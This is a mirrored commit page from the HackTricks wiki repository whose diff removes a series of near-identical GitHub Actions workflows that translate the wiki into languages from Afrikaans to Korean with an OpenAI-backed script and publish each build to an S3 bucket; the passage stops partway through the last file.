mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/todo/hardware-hacking/side_channel_analysis.md', 'src/w
This commit is contained in:
parent
73f826a648
commit
e8eb4c7133
119
.github/workflows/translate_af.yml
vendored
119
.github/workflows/translate_af.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to AF (Afrikaans)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: af
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Afrikaans
|
||||
BRANCH: af
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_de.yml
vendored
119
.github/workflows/translate_de.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to DE (German)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: de
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: German
|
||||
BRANCH: de
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_el.yml
vendored
119
.github/workflows/translate_el.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to EL (Greek)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: el
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Greek
|
||||
BRANCH: el
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_es.yml
vendored
119
.github/workflows/translate_es.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to ES (Spanish)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: es
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Spanish
|
||||
BRANCH: es
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_fr.yml
vendored
119
.github/workflows/translate_fr.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to FR (French)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: fr
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: French
|
||||
BRANCH: fr
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_it.yml
vendored
119
.github/workflows/translate_it.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to IT (Italian)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: it
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Italian
|
||||
BRANCH: it
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_ja.yml
vendored
119
.github/workflows/translate_ja.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to JA (Japanese)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: ja
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Japanese
|
||||
BRANCH: ja
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
run: aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete
|
119
.github/workflows/translate_ko.yml
vendored
119
.github/workflows/translate_ko.yml
vendored
@ -1,119 +0,0 @@
|
||||
name: Translator to KO (Korean)
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
paths-ignore:
|
||||
- 'scripts/**'
|
||||
- '.gitignore'
|
||||
- '.github/**'
|
||||
workflow_dispatch:
|
||||
|
||||
concurrency: ko
|
||||
|
||||
permissions:
|
||||
id-token: write
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
run-translation:
|
||||
runs-on: ubuntu-latest
|
||||
environment: prod
|
||||
env:
|
||||
LANGUAGE: Korean
|
||||
BRANCH: ko
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v2
|
||||
with:
|
||||
fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
|
||||
|
||||
- name: Set up Python
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: 3.12
|
||||
|
||||
- name: Install python dependencies
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip3 install openai tqdm tiktoken
|
||||
|
||||
# Install Rust and Cargo
|
||||
- name: Install Rust and Cargo
|
||||
uses: actions-rs/toolchain@v1
|
||||
with:
|
||||
toolchain: stable
|
||||
override: true
|
||||
|
||||
# Install mdBook and Plugins
|
||||
- name: Install mdBook and Plugins
|
||||
run: |
|
||||
cargo install mdbook
|
||||
cargo install mdbook-alerts
|
||||
cargo install mdbook-reading-time
|
||||
cargo install mdbook-pagetoc
|
||||
cargo install mdbook-tabs
|
||||
cargo install mdbook-codename
|
||||
|
||||
|
||||
- name: Update & install wget & translator.py
|
||||
run: |
|
||||
sudo apt-get update
|
||||
sudo apt-get install wget -y
|
||||
mkdir scripts
|
||||
cd scripts
|
||||
wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
|
||||
cd ..
|
||||
|
||||
- name: Download language branch #Make sure we have last version
|
||||
run: |
|
||||
git config --global user.name 'Translator'
|
||||
git config --global user.email 'github-actions@github.com'
|
||||
git checkout "$BRANCH"
|
||||
git pull
|
||||
git checkout master
|
||||
|
||||
- name: Run translation script on changed files
|
||||
run: |
|
||||
echo "Starting translations"
|
||||
echo "Commit: $GITHUB_SHA"
|
||||
|
||||
# Export the OpenAI API key as an environment variable
|
||||
export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
|
||||
|
||||
# Run the translation script on each changed file
|
||||
git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
|
||||
if echo "$file" | grep -qE '\.md$'; then
|
||||
echo -n "$file , " >> /tmp/file_paths.txt
|
||||
else
|
||||
echo "Skipping $file"
|
||||
fi
|
||||
done
|
||||
|
||||
echo "Translating $(cat /tmp/file_paths.txt)"
|
||||
python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
|
||||
|
||||
# Push changes to the repository
|
||||
- name: Commit and push changes
|
||||
run: |
|
||||
git checkout "$BRANCH"
|
||||
git add -A
|
||||
git commit -m "Translated $BRANCH files" || true
|
||||
git push --set-upstream origin "$BRANCH"
|
||||
|
||||
# Build the mdBook
|
||||
- name: Build mdBook
|
||||
run: mdbook build
|
||||
|
||||
# Login in AWs
|
||||
- name: Configure AWS credentials using OIDC
|
||||
uses: aws-actions/configure-aws-credentials@v3
|
||||
with:
|
||||
role-to-assume: ${{ secrets.AWS_ROLE_ARN }}
|
||||
aws-region: us-east-1
|
||||
|
||||
# Sync the build to S3
|
||||
- name: Sync to S3
|
||||
